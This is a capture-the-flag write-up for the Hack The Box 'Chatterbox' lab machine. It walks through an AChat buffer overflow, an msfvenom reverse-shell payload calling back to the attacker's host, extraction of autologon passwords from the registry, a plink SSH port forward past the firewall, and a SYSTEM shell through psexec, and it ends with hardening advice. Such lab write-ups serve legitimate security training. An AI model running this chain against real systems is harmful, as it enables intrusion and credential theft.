Hack The Box is an online platform that hosts virtual machines that are vulnerable by design to sharpen one's penetration testing and security skills. Gaining an initial foothold on the Chatterbox machine is not very complex, as a low privilege shell can be obtained through a service with a known vulnerability and a publicly available exploit. Elevating privileges from that shell to SYSTEM is a bit more challenging, as it requires some more advanced techniques.
- Reg query, Netstat and Certutil
- Python’s SimpleHTTPServer
- Impacket psexec.py
Running an initial Nmap scan against the default set of the 1,000 most common TCP ports reveals no open ports.
Investigating further, a full TCP port scan (-p-) with the options -n -Pn -T5 to speed up the scan reveals that ports 9255 and 9256 are open.
Running a targeted service scan against both ports reveals the AChat service.
A quick search with searchsploit reveals two public exploits for the AChat service.
As Python is my language of choice I copy the Python exploit out of the local Exploit-DB mirror to investigate it and modify it where necessary.
Inspecting the exploit's code reveals that it is a buffer overflow exploit.
The author of the exploit included the msfvenom command used to generate the exploit's shellcode. Upon successful exploitation of the buffer overflow the shellcode launches the calculator application as a proof of concept.
Further inspection of the exploit code reveals a hard-coded target IP address that needs to be changed to the IP address of the victim.
Exploitation: Initial Shell
As noted earlier, the exploit's shellcode launches calculator upon successful exploitation. To gain a shell on the victim, that shellcode needs to be replaced with shellcode that connects back to the attacking machine, creating a reverse shell.
New shellcode can be generated with the following msfvenom command. The x86/unicode_mixed encoder, the BufferRegister=EAX setting and the bad-character list (the null byte and every byte from 0x80 to 0xff) are kept from the author's original command so that the new payload survives the same Unicode conversion inside AChat. Note the use of EXITFUNC=thread: the shellcode then terminates only its own thread when it exits, which makes a crash of the AChat process less likely.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=443 EXITFUNC=thread -a x86 --platform windows -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
With the old shellcode replaced and the IP of the victim changed, an Ncat listener should be started on port 443, the LPORT given to msfvenom.
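Swapping shellcode into someone else's exploit is where most failures happen: a single bad character or a payload that no longer fits the buffer breaks the overflow silently. The following is an added example, not code from the original post or from the exploit author: it reassembles the shellcode from the `-f python` output that msfvenom prints (the `buf =  b""` / `buf += b"..."` lines), then checks it against the bad-character list from the command above and against an assumed slot size before it is pasted into the exploit. The two sample outputs and the MAX_LEN value are constructed for this example and are not the real AChat buffer limit.

```python
import ast
import re

# Bad characters from the msfvenom command on this page: the null byte and
# every byte from 0x80 to 0xff. Anything else is allowed in the payload.
BAD_CHARS = frozenset([0x00] + list(range(0x80, 0x100)))

# One line of msfvenom's `-f python` output: `buf =  b""` or `buf += b"\x.."`.
_BUF_LINE = re.compile(r'^\s*buf\s*\+?=\s*(b?"(?:[^"\\]|\\.)*")\s*$')


def parse_msfvenom_python(output: str) -> bytes:
    """Reassemble the raw shellcode from msfvenom `-f python` output.

    Each string literal is evaluated with ast.literal_eval, never exec, so a
    pasted exploit file cannot run anything while it is being inspected.
    """
    shellcode = bytearray()
    for line in output.splitlines():
        match = _BUF_LINE.match(line)
        if not match:
            continue  # blank lines, comments, other code
        literal = ast.literal_eval(match.group(1))
        if isinstance(literal, str):  # older output without the b prefix
            literal = literal.encode("latin-1")
        shellcode += literal
    return bytes(shellcode)


def find_bad_chars(shellcode: bytes, bad=BAD_CHARS) -> dict:
    """Map every bad byte found in shellcode to the offsets where it occurs."""
    hits = {}
    for offset, byte in enumerate(shellcode):
        if byte in bad:
            hits.setdefault(byte, []).append(offset)
    return hits


def check_payload(shellcode: bytes, max_len: int) -> list:
    """Return human-readable problems; an empty list means the payload is usable."""
    problems = []
    if not shellcode:
        problems.append("empty shellcode")
    if len(shellcode) > max_len:
        problems.append(f"shellcode is {len(shellcode)} bytes, slot holds {max_len}")
    for byte, offsets in sorted(find_bad_chars(shellcode).items()):
        problems.append(f"bad char 0x{byte:02x} at offsets {offsets[:5]}")
    return problems


# Constructed samples in msfvenom's `-f python` layout (made up for this
# example, not output of the command on the page). SAMPLE_DIRTY appends a
# line with a null byte and a 0x90 NOP, both of which are bad characters.
SAMPLE_CLEAN = '''buf =  b""
buf += b"\\x50\\x50\\x59\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41"
buf += b"\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41\\x49\\x41"
'''
SAMPLE_DIRTY = SAMPLE_CLEAN + 'buf += b"\\x41\\x00\\x90\\x41"\n'

# MAX_LEN is an assumed slot size for illustration, not the AChat exploit's
# real limit; read it off the exploit's buffer layout before relying on it.
MAX_LEN = 30

if __name__ == "__main__":
    for name, sample in (("clean", SAMPLE_CLEAN), ("dirty", SAMPLE_DIRTY)):
        shellcode = parse_msfvenom_python(sample)
        print(f"{name}: {len(shellcode)} bytes ->",
              check_payload(shellcode, MAX_LEN) or "OK")
```

Run it over the real msfvenom output before touching the exploit: an empty problem list means the payload can replace the calculator shellcode as-is, while any reported offset points at a byte the Unicode conversion would mangle.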
Executing the modified exploit with Python.
The victim connects back to the Ncat listener, providing a low privilege reverse shell as the user Alfred.
Windows privilege escalation techniques are worth a post of their own. For now, what is relevant is that a registry query of the Winlogon key for automatic logon credentials reveals a stored clear text password.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultPassword"
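When the shell is a bare reverse shell it is often easier to paste the raw reg query output back on the attacking side than to read it in place. The following is an added example, not code from the original post: it parses reg query output in the four-space separated layout reg.exe prints, then decides whether a Winlogon key actually holds autologon credentials. The distinction it draws is worth knowing: a non-empty DefaultPassword is the finding, while AutoAdminLogon only says whether Windows is currently using it at boot. The sample output, including the user name and password, is constructed for this example and is not what the machine returned.

```python
import re

# Constructed `reg query` output for the Winlogon key, in the four-space
# separated layout reg.exe prints. Names and values are made up for this
# example; they are not the values recovered from the machine.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    DefaultPassword    REG_SZ    Example-P4ss!
    AutoAdminLogon    REG_SZ    1
    Shell    REG_SZ    explorer.exe
"""

# A value line: 4 spaces, name, 4 spaces, REG_* type, optionally 4 spaces and data.
_VALUE_LINE = re.compile(r"^ {4}(.+?) {4}(REG_[A-Z_]+)(?: {4}(.*))?$")


def parse_reg_query(text: str) -> dict:
    """Parse reg query output into {key_path: {value_name: (type, data)}}."""
    keys = {}
    current = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.rstrip()
            keys[current] = {}
            continue
        match = _VALUE_LINE.match(line)
        if match and current is not None:
            name, reg_type, data = match.groups()
            keys[current][name] = (reg_type, (data or "").rstrip())
    return keys


def find_autologon_credentials(keys: dict):
    """Return the autologon credentials stored under a Winlogon key, or None.

    A non-empty DefaultPassword is the finding; AutoAdminLogon only tells
    whether Windows is actually using it at boot.
    """
    for path, values in keys.items():
        if not path.lower().endswith("\\winlogon"):
            continue
        password = values.get("DefaultPassword", ("", ""))[1]
        if not password:
            continue
        return {
            "user": values.get("DefaultUserName", ("", ""))[1],
            "domain": values.get("DefaultDomainName", ("", ""))[1],
            "password": password,
            "auto_admin_logon": values.get("AutoAdminLogon", ("", "0"))[1].strip() == "1",
        }
    return None


if __name__ == "__main__":
    print(find_autologon_credentials(parse_reg_query(SAMPLE_REG_OUTPUT)))
```

The same parser works for any key dumped with reg query, so the credential check can be extended to other values that are known to store secrets without changing the parsing.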
Further investigation with the netstat command line utility reveals the Windows SMB service listening on port 445. Port 445 is not reachable externally, as it did not show up in the Nmap results during enumeration; external access to port 445 is most likely blocked by the Windows firewall.
With a port forward it is possible to make port 445 reachable from the attacking machine even though the firewall blocks external access. The forward can be set up with the plink.exe command line utility, the command line SSH client from the PuTTY suite. Before the port forward can be established, plink.exe needs to be transferred to the victim machine.
More about techniques to transfer files to a Windows victim can be found in a previous post here.
Copying and compressing the plink.exe executable into the web root and starting Python's SimpleHTTPServer on port 80 to serve plink.exe over HTTP.
Preparing the OpenSSH server on the attacking machine to accept the remote port forward that will be initiated from the victim. Because the forward binds port 445 on the attacking machine, a privileged port, the SSH login used by plink must be allowed to bind it (the command below logs in as root), and nothing else, such as a local Samba service, may already be listening on that port.
Now that the Python SimpleHTTPServer is running the certutil.exe command line utility on the victim can be leveraged to download plink.exe.
Now that the plink.exe command line utility is available on the victim, a port forward for port 445 can be initiated. The -R option asks the SSH server, the attacking machine, to listen on port 445 and to forward every connection to 127.0.0.1:445 on the victim, so SMB becomes reachable on the attacking machine at the address 127.0.0.1, the loopback or localhost interface.
plink.exe -l root -R 445:127.0.0.1:445 10.10.14.17
To verify that the port forward was successful, the netstat command line utility can be run on the attacking machine. Port 445 in a listening state on the loopback interface confirms the forward.
Now that port 445 is reachable from the attacking machine and the firewall is bypassed, the Windows SMB service is open to attack. Getting a shell with the discovered clear text password is trivial with the popular Impacket psexec.py script from Core Security, pointed at 127.0.0.1. Note that psexec.py uploads and starts a service binary through the ADMIN$ share, so the account needs local administrator rights; the resulting shell runs as SYSTEM.
The AChat software is vulnerable to a buffer overflow that leads to a low privilege shell. From that shell, clear text credentials are recovered from the registry and the Windows SMB service is found listening on the victim. After some clever use of port forwarding a SYSTEM shell can be obtained over SMB with the recovered clear text password, fully compromising the machine.
The Chatterbox compromise serves as a good example of why machine hardening and outbound traffic filtering are important aspects of system security that should not be overlooked.
The following configuration changes should be considered to mitigate risk.
- Limit the use and storage of clear text credentials when possible
- Access to the AChat service should be disabled and alternatives should be researched as there is no patch available for the discovered vulnerability
- Consider disabling the Windows SMB service and other unneeded services to reduce the attack surface of the machine
- Consider configuring the firewall to block outgoing traffic for applications that do not need network access; both the reverse shell and the SSH port forward in this write-up depend on unrestricted outbound connections
Furthermore, the following policy changes should be considered.
- Implement strong password policy guidelines and enforce those guidelines where possible
- Develop and implement a system hardening policy to reduce the attack surface of new and existing machines